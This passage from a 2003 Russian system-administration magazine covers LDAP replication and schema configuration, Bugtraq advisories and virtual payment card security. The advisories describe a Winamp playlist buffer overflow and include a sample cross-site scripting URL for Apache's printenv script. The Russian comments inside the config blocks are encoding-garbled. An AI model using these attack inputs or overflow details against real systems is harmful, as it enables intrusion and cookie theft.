# äâóìÿ ñêîáêàìè, à ÏÅÐÅÄ íèìè.
# Ïðèâåäó íåñêîëüêî ïðèìåðîâ ôèëüò-
# ðîâ: (|(cn=admin)(uid=root)) –
# èëè cn admin èëè UID root
# (cn=admin) - òîëüêî cn = admin
# Â äàííîì ïðèìåðå äîïóñòèìûì ÿâëÿþò-
# ñÿ òîëüêî îáúåêòû, ïðèíàäëåæàùèå
basedn
# O=myorg, OU=sysopka
AuthLDAPUrl ldaps://test.ru/
O=myorg, OU=sysopka
# Òðåáóåì òîëüêî ïîëüçîâàòåëåé,
# ïðîøåäøèõ ïðîâåðêó íà ldap-ñåðâåðå
require valid-user
</Directory>
Существует ещё несколько опций
модуля, но они используются реже, и
о них можно почитать в документации.
Proftpd имеет схожий модуль auth-ldap,
но здесь описывать его я не буду, т.к.
настройка модуля ftp-сервера очень
похожа на конфигурацию апача.
Настройка почтовых серверов
также не представляет особой про-
блемы. Я, например, без проблем
настроил postfix и курьер, последний
настраивать особенно легко, т.к. он
работает сразу же после того, как
указывается LDAP-сервер, основной
dn, запись администратора и её па-
роль в открытом виде для доступа к
полям паролей пользователей
(опять же можно использовать
proxy). Конфигурация postfix не-
сколько сложнее:
main.cf
virtual_maps = ldap:ldapvirtual
# Ñåðâåð ldap è ïîðò
ldapvirtual_server_host = test.ru
ldapvirtual_server_port = 389
# Îñíîâíîé dn äëÿ ïîèñêà ïî áàçå
81
 безопасность
ldapvirtual_search_base = ou=mail,
o=YourOrg, c=nl
# Äîìåí äëÿ ïîèñêà
ldapvirtual_domain = test.ru
# Àòðèáóò, êîòîðûé äîëæåí ÷èòàòü
# postfix ïðè ðàáîòå ñ ldap (ïî
# e-mail àäðåñó îïðåäåëÿåòñÿ ïóòü).
ldapvirtual_result_attribute =
maildrop
# Ñ÷èòûâàåì îäíó çàïèñü èç âûáîðêè
ldapvirtual_scope = one
# Îñíîâíîé êîíòåêñò è ïàðîëü
ldapvirtual_bind_dn = cn=proxy,
dc=test, dc=ru
ldapvirtual_bind_pw = secret
Реплики
Ну вот, с интеграцией LDAP разобра-
лись... Пора рассказать о дополни-
тельных возможностях данной систе-
мы. Итак, реплики. Реплики – это одна
из мощных возможностей системы
директорий LDAP. Реплики – это рас-
копирование базы данных LDAP по
нескольким серверам, т.е. фактичес-
ки само дерево «размазывается» по
серверам. Реплика существует меж-
ду несколькими серверами, один из
которых является primary (это похоже
на службу DNS, только немного для
других целей). В таком случае первич-
ный сервер обрабатывает запросы на
запись и на чтение, а вторичные –
только на чтение. При модификации
данных на главном сервере он захо-
дит на все вторичные и синхронизи-
рует их базы со своей. Для создания
реплик необходимо три вещи:

настройка файлов slapd.conf глав-
ного и вторичных серверов;

первоначальный перенос основ-
ной базы с основного сервера на
вторичные;

запуск демона slurpd, который и
осуществляет синхронизацию сер-
веров.
После осуществления всего этого
можно разбивать пользователей на
группы и указывать для их клиентов
определённый LDAP-сервер и создать
основной сервер, который будет все
вторичные синхронизировать (звездо-
образная схема). При этом любые из-
менения в базе любого из LDAP-сер-
веров будут раскопированы на все
сервера, включая основной. Вот при-
мерная схема действия реплики при
получении запроса от клиента.

Вторичный LDAP-сервер получает
запрос на изменение и говорит кли-
енту, что надо изменить данные на
основном сервере (то есть пере-
82
направляет клиента к главному).

Клиент посылает запрос главному
серверу, который он обрабатыва-
ет. При этом сервер знает, что кли-
ент был к нему перенаправлен (это
записывается в лог реплики).

slurpd замечает (после проше-
ствия некоторого времени), что
данные были обновлены, и осуще-
ствляет синхронизацию.

Вторичные сервера получают зап-
рос от slurpd главного сервера и,
обновив данные у себя, посылают
ответ slurpd, этот ответ также мо-
жет быть записан в лог реплики.
Ну всё, хватит теории, начинаем
настройку. Для начала поправим
slapd.conf:
# Ýòî îñíîâíîé ñåðâåð!
# Äîáàâèì íåñêîëüêî ðåïëèê. Êàæäàÿ
# äèðåêòèâà ñîîòâåòñòâóåò îäíîìó
# âòîðè÷íîìó ldap-ñåðâåðó. Óêàçûâàåì
# àäðåñ âòîðè÷íîãî ñåðâåðà(host),
# dn äëÿ ðåïëèêàòîðà, ìåòîä
# àóòåíòèôèêàöèè è ïàðîëü ðåïëèêàöèè
# (ïàðîëü äëÿ äàííîãî dn).  êà÷åñòâå
# ðåïëèêàòîðà ìîæíî èñïîëüçîâàòü ðó-
# òà. ×åñòíî ãîâîðÿ, äëÿ ðåïëèê ÿ áû
# ñîçäàë òóííåëü ÷åðåç ssh èëè stun-
# nel è ïðèñîåäèíÿëñÿ áû íå ê óäàë¸í-
# íîìó õîñòó ê ïîðòó 389, à ê ëîêàëü-
# íîìó íà íàçíà÷åííûé ïîðò (äëÿ ðàç-
# íûõ ðàáîâ ìîæíî ñäåëàòü íåñêîëüêî
# òóííåëåé)
replica host=slave1.test.ru:389
binddn="cn=replicator, dc=test, dc=ru"
bindmethod=simple
credentials=replicator_password
# Ñëåäóþùèé ðàá
replica host=slave2.test.ru:389
binddn="cn=replicator, dc=test, dc=ru"
bindmethod=simple
credentials=replicator_password
# Çàïèñûâàåì äàííûå ðåïëèê â log-
# ôàéë, ýòî äåëàòü íåîáÿçàòåëüíî
# (äàæå íåæåëàòåëüíî, ò.ê. ïîíèæàåò
# ïðîèçâîäèòåëüíîñòü). Ýòà îïöèÿ åäè-
# íà äëÿ âñåõ âòîðè÷íûõ ñåðâåðîâ
replogfile /var/log/ldap/
replica.log
После чего на вторичных серверах
вносим ещё пару строк в slapd.conf:
# Ýòî âòîðè÷íûé ñåðâåð!
# Íåëüçÿ èñïîëüçîâàòü äèðåêòèâû
# replica replogfile. Íåîáõîäèìî
# ñîçäàòü íåêèé updatedn, ñîâïàäàþùèé
# ñ binddn îñíîâíîãî ñåðâåðà,
# ïî êîòîðîìó ãëàâíûé áóäåò
# ìîäèôèöèðîâàòü äàííûå.
updatedn="cn=replicator,dc=test,dc=ru"
# Âêëþ÷àåì àäðåñ îñíîâíîãî ñåðâåðà
# ldap, êóäà áóäåò ïåðåíàïðàâëÿòüñÿ
# êëèåíò, ïûòàþùèéñÿ ìîäèôèöèðîâàòü
# äàííûå
updateref master.test.ru:389
# Íàäî äàòü íåîáõîäèìûå ïðèâèëåãèè
# ðåïëèêàòîðó, ò.ê. åìó íåîáõîäèì
# äîñòóï íà çàïèñü äàííûõ
access to *
by dn="cn=root, dc=test, dc=ru" write
by dn="cn=replicator, dc=test, dc=ru"
write
by self write
После настройки всех серверов
необходимо перекопировать содержи-
мое базы данных LDAP основного сер-
вера на все вторичные сервера, для
этого необходимо перенести содержи-
мое DatabaseDir физически(!). После
всего этого желательно проиндекси-
ровать базу, иначе поиск по ней за-
медляется:
slapindex -f /etc/ldap/slapd.conf
-b "dc=test, dc=ru"
Затем на главном сервере запус-
каем slurpd:
# slurpd
Использование stunnel в данном
случае также приемлемо – на главном
сервере устанавливаются клиенты
туннеля, которые направлены ко вто-
ричным LDAP-серверам, но на серве-
ре эти туннели будут висеть на раз-
ных портах, и LDAP-сервер будет со-
единяться с локальными туннелями,
висящими на портах, которые соот-
ветствуют рабам ldap:
stunnel -c -d 9636 -r
slave1.test.ru:636
stunnel -c -d 10636 -r
slave2.test.ru:636
И это всё! Если вторичный сервер
не сможет пробиться к основному (на-
пример, электрик дядя Ваня дерзко пе-
рерубил оптоволокно), то клиент, под-
ключенный к вторичному серверу, смо-
жет читать информацию, но изменять
её не сможет. А если в результате бо-
евых действий рухнул винт, то с любо-
го вторичного сервера можно будет
восстановить первозданную базу
LDAP (какой она была до краха основ-
ного сервера). По такой распределён-
ной схеме можно создавать сколь угод-
но большую сеть, так как основными
являются запросы на чтение, и нагру-
жаться будут вторичные сервера.
Создание объектов LDAP
Файлы схем
LDAP, как уже было сказано, являет-
ся расширяемой объектно-ориентиро-
ванной системой, и вы можете добав-
лять новые классы с новыми атрибу-
тами в базу LDAP. Для этой цели су-

ществуют файлы схем. В файле схе-
мы описываются классы и их атрибу-
ты, чтобы подключить схему к LDAP,
необходимо прописать в файле
slapd.conf полный путь к нужной схе-
ме. По умолчанию к LDAP подключе-
ны несколько основных схем, суще-
ствуют также сторонние схемы, на-
пример для SAMBA или некоторых
почтовых серверов. Чтобы эти схемы
использовать, в slapd.conf прописыва-
ют нечто подобное:
# Âêëþ÷àåì ñõåìû ïî óìîë÷àíèþ
# êîìàíäîé include
include /usr/share/openldap/schema/
core.schema
include /usr/share/openldap/schema/
cosine.schema
include /usr/share/openldap/schema/
inetorgperson.schema
# Âêëþ÷àåì ñõåìó ñàìáû
include /usr/share/openldap/schema/
samba.schema
# Âêëþ÷àåì ñâîþ ñõåìó
include /usr/share/openldap/schema/
my_cool.schema
Теперь разберёмся, как эти схемы
создавать. Если вы откроете какую-
нибудь схему, то сначала всё покажет-
ся довольно жутким. Хочу сразу же
вас обрадовать: это действительно
жутко! Чтобы хоть чего-то объяснить
расскажу об OID. OID (уникальный
идентификатор объекта) использует-
ся LDAP, чтобы не было наложений
классов и их атрибутов. OID состоит
из числовых значений разделённых
точкой и составляющих в целом
иерархию OID:
1.1
OID äàííîé îðãàíèçàöèè(âûáèðà-
åòñÿ ëþáîé)
1.1.2
Ñàìè èäåíòèôèêàòîðû LDAP
1.1.2.1
Àòðèáóòû êëàññîâ
1.1.2.1.1
Êîíêðåòíûé àòðèáóò(ìåíÿåì ïîñëåä-
íþþ öèôðó äëÿ êàæäîãî àòðèáóòà)
1.1.2.2
Ñàìè êëàññû
1.1.2.2.1
Êîíêðåòíûé êëàññ
Для получения OID можно зайти
на узел www.iana.org (начинается с
1.3.6.1.4). Вообще, как я понял, со-
ставление иерархии OID – дело до-
вольно проблематичное. Проще все-
го взять какой-либо OID для атрибу-
тов (обычной базой OID является
1.3.6.1.4) и для классов, а затем про-
сто добавить ещё несколько цифр.
А вообще, лучше просто посмот-
№2(3), февраль 2003
реть, как сделано в готовых схемах
(я думаю, что изменить последнюю
пару чисел готового OID не соста-
вит труда, а описывать это мне пред-
ставляется совершенно ненужным).
После сочинения OID перейдём к до-
бавлению новых атрибутов. Для
этой цели используется директива
attributetype. Вот как выглядят опи-
сания атрибутов в схеме SAMBA
(приведён маленький фрагмент):
attributetype ( 1.2.840.113556.1.4.8
NAME 'userAccountControl'
SYNTAX 1.3.6.1.4.1.1466.115.121.1.27
SINGLE-VALUE )
attributetype (1.2.840.113556.1.4.166
NAME 'groupMembershipSAM'
SYNTAX 1.3.6.1.4.1.1466.115.121.1.40
SINGLE-VALUE )
attributetype (1.2.840.113556.1.4.213
NAME 'defaultClassStore'
SYNTAX 1.3.6.1.4.1.1466.115.121.1.12)
Как видно, в скобках идёт внача-
ле OID атрибута, затем NAME и имя
атрибута в кавычках, а затем тип ат-
рибута. Вот тут немного остановлюсь.
Видно, что тип атрибута – это также
OID (ужас-то какой, но это позволяет
добавлять даже свои типы). Стандар-
тно предопределено несколько типов:
ëîãè÷åñêèé
1.3.6.1.4.1.1466.115.121.1.7
èìÿ LDAP(DN)
1.3.6.1.4.1.1466.115.121.1.12
ñòðîêà ôîðìàòà UTF-8
1.3.6.1.4.1.1466.115.121.1.15
ñòðîêà ASCII
1.3.6.1.4.1.1466.115.121.1.26
öåëîå
1.3.6.1.4.1.1466.115.121.1.27
DN è èäåíòèôèêàòîð ïîëüçîâàòåëÿ(UID)
1.3.6.1.4.1.1466.115.121.1.34
ñòðîêà èç ÷èñåë
1.3.6.1.4.1.1466.115.121.1.36
OID
1.3.6.1.4.1.1466.115.121.1.38
Кроме типа атрибута можно ука-
зывать дополнительные его пара-
метры:

DESC – строка (обычный текст),
которая описывает данный атри-
бут.

SUP – строка (имя) или OID роди-
тельского атрибута (происходит
наследование синтаксиса роди-
тельского атрибута).

EQUALITY – строка (наименование)
или OID метода поиска, например,
caseIgnoreMatch для поиска данно-
го атрибута без учёта регистра.

SINGLE-VALUE – просто флаг (пос-
ле него должен обязательно сто-
безопасность
ять пробел!), который указывает,
что данный атрибут может прини-
мать только единственное значе-
ние (по умолчанию ему можно при-
сваивать несколько значений).

NO-USER-MODIFICATION – флаг,
запрещающий модификацию дан-
ного атрибута пользователем (по
умолчанию модификация разре-
шена).
При составлении схемы учтите, что
после каждой лексемы (включая скоб-
ки и флаги) должен идти один пробел.
Приведу пример составления атрибу-
та картинки как пути к jpg-файлу:
attributetype ( 1.1.2.1.2 NAME 'pic'
DESC 'my jpeg picture'
SYNTAX 1.3.6.1.4.1.1466.115.121.1.26
SINGLE-VALUE )
И, например, картинки на сайте,
представленной в виде URL:
attributetype ( 1.1.2.1.3 NAME 'URLpic'
DESC 'URL to picture'
SUP pic )
Создание нового класса несколь-
ко проще, приведу пример класса
cronEntry из cron.schema:
objectclass (1.3.6.1.4.1.7006.1.3.2.1
NAME 'cronEntry'
SUP top
STRUCTURAL
MUST ( cn $ cronCommand $ uid )
MAY ( cronHost $
cronMinute $
cronHour $
cronDay $
cronMonth $
cronDayOfWeek $
owner $
description ) )
Вначале идёт OID, имя (не забудь-
те кавычки), родительский класс (на-
следуются атрибуты), тип класса (для
знакомых с объектно-ориентирован-
ной моделью объясняю: ABSTRACT –
абстрактный (нельзя делать объекты
данного класса, можно только насле-
довать) и STRUCTURAL – обычный
(по умолчанию)). Далее идут поля ат-
рибутов для класса: MUST – обяза-
тельные атрибуты, MAY – необяза-
тельные. Список атрибутов заключа-
ется в скобки и разделяется по стран-
ной прихоти не запятыми, а знаками
доллара (очевидно, это намёк разра-
ботчиков). Думаю, тут можно ещё раз
напомнить о необходимости пробе-
лов после каждой лексемы (и долла-
83
 безопасность
ров тоже). Вот видите, создание
объектов – не такая уж и тяжёлая
вещь. Примеров приводить не буду,
т.к. класс cronEntry является идеаль-
ным объектом для рассмотрения.
Честно говоря, я всё-таки рекомен-
довал бы всем, кто собирается созда-
вать новую схему, посмотреть суще-
ствующие, т.к. во-первых, необходи-
мо убедиться в уникальности OID, а
во-вторых, меньше будет ошибок в
своей схеме.
В качестве заключения
Я думаю, что если у вас в распоряже-
нии находится крупная сеть, то приме-
нение LDAP является идеальным ре-
шением централизованного управле-
ния аутентификацией на всех уровнях.
Использование реплик делает LDAP
надёжным, а хорошие методы шифро-
вания обеспечивают приличную сте-
пень безопасности. Кроме этого, LDAP
84
является довольно быстрым механиз-
мом поиска и, что очень важно, хра-
нит всё в древовидной базе данных.
Для небольших сетей, я думаю, лучше
использовать текстовые файлы: про-
сто и сердито, а главное быстрее чем
LDAP. Но в крупных сетях это приве-
дёт к тихому ужасу, связанному с кон-
фликтами разных пользователей, ма-
шин, серверов. Я сам был свидетелем
сетки из ~1000 машин, соединённых
банальной сеткой мелкомягких (без
доменов!), где NovellNetware использо-
валась лишь как файл-сервер. LDAP
и SAMBA в этом случае снимают боль-
шинство этих проблем. Итак, на этот
раз всё. В следующий раз я расскажу
о популярных LDAP-клиентах и серве-
рах, о создании собственных клиентов.
Список полезных ссылок:
http://www.tldp.org – LDAP HOWTO
и LDAP-implementation HOWTO;
http://www.openldap.org – ldap guide
(aka HOWTO, обычно самое новое ру-
ководство);
http://www.mandrakesecure.net/
en/docs/ldap-auth.php – очень при-
личная статья Vincent Danena, кото-
рая описывает принципы настройки
LDAP;
http://www.opennet.ru – статья по
работе с LDAP на русском языке, но
она довольно старая, хотя там нема-
ло полезного материала.
К сожалению, в данной статье я
упустил из виду некоторые вещи по
работе с LDAP, например, работу с
SASL, Kerberos, описание програмных
компонентов ldap. Постараюсь зак-
рыть эти недостатки в следующих ста-
тьях. LDAP – довольно сложная сис-
тема, поэтому охватить всё не уда-
лось. Надеюсь, что кому-то мои тру-
ды пошли на пользу.

Переполнение буфера в Winamp
Winamp поддерживает проигрывание b4s-файлов, ко-
торые составляются посредством xml. Синтаксис таков:
<?xml version="1.0" encoding='UTF-8' standalone="yes"?>
<WinampXML>
<!-- Generated by: Nullsoft Winamp3 version 3.0 -->
<playlist num_entries="[êîë-âî çàïèñåé]"
label="[íàçâàíèå_list'a]">
<entry Playstring="file:[ïóòü_ê_çâóêîâîìó_ôàéëó]">
<Name>[íàçâàíè_ïåñíè]</Name>
<Length>[âåëè÷èíà_â_áàéòàõ]</Lengt>
</entry>
</playlist>
</WinampXML>
Переполнение буфера происходит при обработке чрез-
мерно длинного названия листа (4-ая строчка). Причем
есть некоторые нюансы:
При получении 16 398 байт переполнение происходит
только при выходе из WinAmp’a. 4-мя байтами затирает-
ся eax и retaddr (причем ret находится в регистре eax). Если
же название листа еще увеличить на ~100b, переполне-
ние произойдет сразу же при запуске. 12-ю байтами пе-
резапишутся ecx, esi и retaddr. Хотя, что касается адрес-
ного пространства, данные могут разниться в зависимос-
ти от билда WinAmp’a и вообще операционной системы.
Так или иначе, составить b4s’ку, протроянивающую сис-
тему, не составляет никакого труда.
Уязвимость обнаружена D4rkGr3y из Damage Hacking
Group.
№2(3), февраль 2003
BUGTRAQ
Межсайтовый скриптинг в Apache
Уязвимость межсайтового скриптинга обнаружена в
типовом сценарии “printenv”, поставляемом с Apache
веб-сервером. Уязвимость позволяет удаленному ата-
кующему создать злонамеренную ссылку, содержащую
произвольный код сценария в параметрах уязвимого
скрипта, который будет выполнен в браузере пользо-
вателя в контексте уязвимого сайта при клике на та-
кую ссылку. Уязвимость позволяет атакующему красть
данные, хранящиеся в куки пользователя. Пример:
http://www.example.com/cgi-bin/printenv/<a
href="bad">test</a>
Уязвимость обнаружена в Apache Software Foundation
Apache 1.3.22-2.0.43.
Множественные уязвимости в KDE
В некоторых случаях KDE неправильно приводит па-
раметры инструкций, переданные в командную оболоч-
ку для исполнения.
Эти параметры могут содержать данные типа URL,
имен файлов и адресов электронной почты, и эти данные
могут быть дистанционно преданы жертве в электронном
сообщении, веб-странице или через другие источники.
Тщательно обрабатывая такие данные, нападающий
может выполнить произвольные команды на уязвимой
системе с привилегиями текущего пользователя.
Уязвимость обнаружена в KDE 2.0-3.0.5.
85
 безопасность
БЕЗОПАСНОСТЬ ТЕХНОЛОГИИ
ВИРТУАЛЬНЫХ КАРТ
Смысл виртуальной карты заключается в том, чтобы психологически «раскрепостить» клиента при
совершении электронных покупок. Действительно, карта, которой пользуется покупатель, связана
с небольшим по размеру счетом, и потому весь риск покупателя ограничен потерей средств на
нем.
Идея виртуальной карты (е-card) осно-
вана на том, что во время проведения
CNP-транзакции (CPN-Cardholder Not
Present – операция покупки по пласти-
ковой карте, в момент совершения ко-
торой клиент не присутствует лично в
торговой точке, а сообщает ей рекви-
зиты своей карты, необходимые для
проведения авторизации) пластиковая
карта как физический объект не
применяется. Используются лишь рек-
визиты карты, и совсем необязатель-
но, чтобы они были нанесены на плас-
тик. Поэтому можно выделить от-
дельные, предназначенные специаль-
но для электронной коммерции номе-
ра карт с сопутствующими им рекви-
зитами, и «привязать» к таким вирту-
альным картам счета с небольшим ос-
татком. В этом случае клиент будет за-
страхован от крупных потерь, связан-
ных с риском мошенничества.
Гута Банк стал первым российс-
ким банком, который приступил к
эмиссии виртуальных карт платеж-
ной системы VISA, получивших
название VISA E-c@rd и специально
предназначенных для осуществления
платежей в Интернете. Проект был
запущен летом 2000 года, после того
как компания VISA International за-
вершила сертификацию VISA E-c@rd
и официально санкционировала их
эмиссию Гута Банком.
Карты VISA E-c@rd предназначе-
ны для оплаты через Интернет любых
видов товаров и услуг в любых элект-
ронных магазинах во всем мире, в том
числе для оплаты услуг операторов
86
сотовой связи, интернет-провайдеров,
туристических компаний, предприя-
тий гостиничного бизнеса и т. д. Для
проведения других операций (расче-
тов в обычной торговой сети, получе-
ния наличных денежных средств) кар-
та VISA E-c@rd не предназначена.
Использование виртуальной карты
удобно для клиента в случае, когда
банк-эмитент дополнительно предос-
тавляет ему услуги интернет-банкин-
га для управления своими счетами. В
этом случае клиент в удаленном режи-
ме при помощи только персонального
компьютера, подключенного к Интер-
нету, может в режиме реального вре-
мени перевести средства со своего
«главного» счета на счет, связанный с
виртуальной картой, в количестве, не-
обходимом для совершения намечен-
ных электронных покупок.
Требования к виртуальным картам
состоят в следующем:

виртуальная карта должна иметь
номер (например, система
MasterCard требует, чтобы номер
карты состоял из 16 цифр) и срок
действия;

система MasterCard требует, что-
бы с виртуальной картой была свя-
зана величина CVC2 (VISA остав-
ляет вопрос использования вели-
чины CVV2 для виртуальной кар-
ты на решение эмитента карты);

к виртуальным картам применяют-
ся те же правила, что и к обычным
картам, за исключением правил,
которые связаны с физическими
характеристиками карт;
СЕРГЕЙ РОПЧАН

эмитенты должны понятным для
клиента образом передать ему но-
мер карты, ее срок действия и т. п.,
а также способ ее использования;

эмитенты должны утвердить вы-
пуск виртуальных карт в соответ-
ствующих департаментах серти-
фикации карт международных
платежных систем;

эмитент должен ясно объяснить
владельцу виртуальной карты, что
она не может использоваться в ре-
жиме Dual Mode, когда авториза-
ция производится по виртуальной
карте, а презентмент сформиро-
ван по обычной карте, привязан-
ной к тому же счету, что и
виртуальная карта.
Для того чтобы передать клиенту
реквизиты виртуальной карты, эми-
тент может использовать некоторый
физический носитель информации о
реквизитах карты (Reference Device –
RD). RD по своим физическим харак-
теристикам должен явным образом
отличаться от обычной карты. В част-
ности, RD не должен иметь тех же
размеров и пропорций, что и обычная
карта, содержать голограмм платеж-
ных систем, а также магнитной поло-
сы и чипа.
В то же время на физическом но-
сителе должен находиться логотип
платежной системы, размеры и цвет
которого определяются правилами
платежной системы. Дизайн физичес-
кого носителя, а также иные средства
доведения информации о реквизитах

карты и правилах ее использования
должны пройти обязательную серти-
фикацию в платежной системе.
Другое важное требование между-
народных платежных систем заклю-
чается в том, что виртуальная карта
может быть выдана:

владельцу «физической» карты;

клиенту, не имеющему «физичес-
кой» карты платежной системы, но
имеющему возможность получить
ее по его первому требованию.
Эти условия по замыслу платеж-
ных систем должны сформировать
столь же серьезное отношение бан-
ка-эмитента к виртуальной карте, как
и к обычной, поскольку ответствен-
ность банка за своего клиента-вла-
дельца виртуальной карты не меня-
ется по сравнению со случаем вла-
дельца обычной карты.
Ключевым фактором в реализа-
ции программ виртуальных карт явля-
ется небольшое время, необходимое
международным системам и банкам-
эмитентам для их запуска. Сегодня
это время оценивается в две недели.
Виртуальные номера карт
Идея виртуальной карты получила
развитие в технологии виртуального
номера карты (используются также
термины pseudo card number и proxy
card number). Суть этой технологии
заключается в том, что при запол-
нении формы торгового предприя-
тия во время операции по оплате
владелец карты вместо реального
номера карты сообщает интернет-
магазину некоторый случайный но-
мер. После того как транзакция
поступает в систему эмитента для
авторизации, производится обрат-
ное преобразование виртуального
номера карты в реальный номер. В
результате при выполнении опера-
ций покупки реальный номер карты
никогда не передается в платежную
сеть и остается в системе эмитен-
та. Таким образом, вероятность ком-
прометации реальных номеров карт,
а также вероятность успешного со-
вершения транзакции мошенником
становятся близкими к нулю.
Технически идея виртуального
номера карты может быть реализо-
вана следующим образом. Клиент
для оплаты электронных покупок с
№2(3), февраль 2003
помощью технологии виртуального
номера карты должен установить на
свой компьютер специальное ПО.
После того как клиент получает от
интернет-магазина для заполнения
форму, содержащую информацию о
реквизитах карты, ПО клиента ини-
циирует обращение к системе сво-
его эмитента. Эмитент генерирует
для клиента виртуальный номер кар-
ты и возвращает его клиенту. При
этом эмитент контролирует в неко-
тором смысле уникальность сгене-
рированного номера карты, а также
принадлежность префикса карты к
выделенному для эмитента диапа-
зону значений BIN.
После этого транзакция выполня-
ется обычным образом. Клиент на-
правляет интернет-магазину запол-
ненную форму, в которой в качестве
номера карты фигурирует виртуаль-
ный номер. В результате выполнения
стандартных процедур обработки
транзакции в системе обслуживаю-
щего банка и платежной системы из
последней в систему эмитента посту-
пает авторизационный запрос, со-
держащий виртуальный номер кар-
ты. Эмитент, получив авторизацион-
ный запрос, устанавливает соответ-
ствие между данными, сгенерирован-
ными при инициализации транзак-
ции, и данными авторизационного
запроса. Соответствие ищется по
целому ряду параметров.
Например, система MasterCard к
обязательным параметрам относит
номер карты, срок ее действия, имя
магазина (Merchant Name), идентифи-
катор магазина (Merchant ID), сумму
транзакции и валюту транзакции.
Эмитент определяет реальный номер
карты, выполняя обратное преобразо-
вание, проводит с его использовани-
ем авторизацию транзакции и резуль-
тат возвращает в платежную сеть,
предварительно вновь подставив в
авторизационный ответ виртуальный
номер карты.
Если в платежной системе исполь-
зуется технология Single Message
System (авторизационный запрос яв-
ляется одновременно и финансовым
сообщением, требующим от эмитен-
та возмещения средств), то процесс
на этом завершается. В случае при-
менения технологии Dual Message
System (процедуры авторизации и
безопасность
расчетов разделены) система эмитен-
та будет обязана также обработать
клиринговое (финансовое) сообще-
ние, связанное с рассматриваемой
транзакцией. При обработке клирин-
гового сообщения требуется выпол-
нить необходимую подстановку ре-
ального номера карты вместо вирту-
ального номера.
Достоинство идеи виртуального
номера карты уже отмечалось. Веро-
ятность мошенничества при реализа-
ции идеи эмитентом практически рав-
на нулю. При этом технология работы
платежной системы никак не затра-
гивается, начиная с уровня торговой
точки – те же протоколы, форматы
сообщений и т. п.
В то же время идея виртуальных
номеров карт имеет и ряд недостатков.
Во-первых, как уже упоминалось,
владелец карты должен установить на
своем компьютере специальное ПО,
называемое электронным кошельком.
Для некоторой категории клиентов
такая процедура сама по себе пред-
ставляет проблему.
Во-вторых, эмитент должен пред-
ложить клиенту процедуру его аутен-
тификации во время обращения кли-
ента за виртуальным номером в сис-
тему эмитента. Как правило, исполь-
зуется система паролей – клиент в
защищенной сессии с системой эми-
тента сообщает последней свой иден-
тификатор и кодовое слово (пароль).
Здесь существуют несколько подхо-
дов к решению задачи. Наиболее на-
дежным является получение клиентом
своих идентификатора и пароля
непосредственно в банке (в крайнем
случае письмом из банка, причем
идентификаторы клиента должны
распечатываться в PIN-конверте для
того, чтобы сделать информацию зак-
рытой для банковского персонала).
Этот подход является неудобным
для клиента. Поэтому на практике
находит применение другой, менее
надежный метод. Клиент получает
свои идентификаторы во время пер-
вой сессии с системой эмитента. Он
идентифицирует себя, представляя
эмитенту реквизиты карты, а также
дополнительную информацию, запра-
шиваемую эмитентом (например, но-
мер паспорта, девичью фамилию ма-
тери и т. п.). В ответ в случае положи-
тельного результата аутентификации
87
 безопасность
клиент получает свой идентификатор
и пароль. Весь обмен информацией
между клиентом и системой эмитен-
та происходит в защищенной сессии.
Логическое соединение с системой
эмитента обеспечивается кошельком
клиента. Более низкая защищенность
этого метода связана с тем, что в про-
цессе идентификации клиента могут
быть различные подставки со сторо-
ны мошенников, имитирующих рабо-
ту эмитента.
В-третьих, помимо виртуального
номера карты система эмитента в не-
которых случаях должна в режиме
реального времени генерировать зна-
чения CVC2/CVV2.
Конечно, эмитент, применяющий
технологию виртуальных номеров
карт, может и не проверять значения
CVC2. В этом случае в платежную
сеть может направляться любое слу-
чайное значение CVC2. Однако при
таком подходе эмитент лишается
возможности использовать резерв-
ную авторизацию (авторизацию
Stand-In), предоставляемую в его
распоряжение многими платежными
системами на случай отказа в рабо-
те системы эмитента. В режиме ре-
зервной авторизации платежная сеть
от лица эмитента в соответствии с
параметрами, установленными эми-
тентом, производит авторизацию
транзакции. В системе резервной
авторизации существует общий па-
раметр для всех префиксов карт, оп-
ределяющий действие эмитента на
случай неверного значения CVC2/
CVV2 – отклонить транзакцию сразу
или продолжить другие проверки.
Если такой параметр установить рав-
ным по значению «не отклонять», то
и по всем другим операциям и пре-
фиксам будет приниматься то же ре-
шение, что наверняка противоречит
интересам эмитента.
В-четвертых, применение техноло-
гии виртуальных номеров карт по-
влечет за собой проблемы для тех
интернет-магазинов, которые сохра-
няют номера карт клиентов, уже од-
нажды обращавшихся в торговое
предприятие за услугами, чтобы не
заставлять клиента набирать свои
реквизиты при следующих обращени-
ях в торговую точку. Очевидно, что
при массовом применении технологии
виртуальных номеров карт БД таких
88
магазинов быстро переполнятся, что
повлечет за собой операционные про-
блемы в их функционировании.
У интернет-магазинов имеются и
другие проблемы. Например, если
клиент совершил в одном и том же
магазине в течение относительно ко-
роткого интервала времени две тран-
закции на одинаковую сумму, то при
необходимости провести операцию
«возврат покупки» будет неясно, ка-
кой номер карты подставлять в тран-
закцию возврата. Это связано с тем,
что в системах торговой точки в ка-
честве ключа для поиска транзакции,
как правило, используется номер
карты и сумма транзакции. Поэтому,
если клиент не может назвать точное
значение номера карты, существует
вероятность того, что при формиро-
вании возврата будет подставлено
неправильное значение номера кар-
ты и в учетной системе магазина по-
явится неправильная запись – будет
«возвращен» не тот товар со всеми
вытекающими последствиями для
подсистемы управления запасами
магазина и т. п.
Наконец, использование виртуаль-
ных номеров карт влечет за собой и
проблемы в системах эмитента. Необ-
ходимость хранения информации обо
всех используемых номерах карт –
одна из них.
Требования к технологии вирту-
альных номеров карт при использова-
нии, например, карт Maestro состоят
в следующем. Эмитент должен гене-
рировать 16-цифровые номера карт
(при этом виртуальный номер карты
может совпадать с реальным номе-
ром карты), а также проверять соот-
ветствие между данными, сгенериро-
ванными при инициализации транзак-
ции, и данными авторизационного
запроса. Как указывалось ранее,
соответствие ищется как минимум по
номеру карты, сроку ее действия,
имени магазина (Merchant Name),
идентификатору магазина (Merchant
ID), сумме транзакции и валюте тран-
закции.
Отличительная особенность ре-
шения для карт Maestro заключает-
ся в том, что владелец карты не дол-
жен ус танавливать на своем
компьютере никакого специального
ПО (элек тронного бумажника).
Транзакция выполняется следую-
щим образом. После того как вла-
делец карты сообщил торговой точ-
ке о готовности платить с использо-
ванием карты Maestro, интернет-
магазин отправляет на сервер эми-
тента (e-Wallet в терминах Maestro),
хранящий информацию о реквизи-
тах своих карт, специальное сооб-
щение. Это сообщение содержит ин-
формацию о торговой точке
(Merchant Name, Merchant ID), о сум-
ме и валюте покупки, идентифика-
тор транзакции в системе торговой
точки и т. п. Одновременно сервер
магазина переключает владельца
карты на сервер эмитента.
Сервер эмитента устанавливает с
владельцем карты защищенное со-
единение и направляет клиенту фор-
му для проведения его аутентифи-
кации. Например, эмитент может зап-
росить у владельца карты ранее пре-
